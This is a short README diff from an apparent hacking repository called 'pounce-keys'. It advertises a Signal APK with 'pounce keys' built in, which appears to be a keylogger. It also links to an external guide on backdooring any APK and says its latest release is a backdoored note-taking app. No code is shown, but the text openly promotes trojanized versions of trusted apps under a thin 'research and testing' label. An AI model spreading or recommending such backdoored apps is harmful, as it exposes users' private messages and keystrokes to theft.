NullPounce/pounce-keys/README.md

 -------[2024] SIGNAL BACKDOOR!!-------------

-I have the latest Signal APK with pounce keys in it "Contact me for info" dm me on discord or check socials on my website"
+I have the latest Signal APK with pounce keys in it! heres a guide on how to backdoor any apk, for research and testing https://file.io/mJLg9xw6zMmI

  latest release is a backdoored note taking app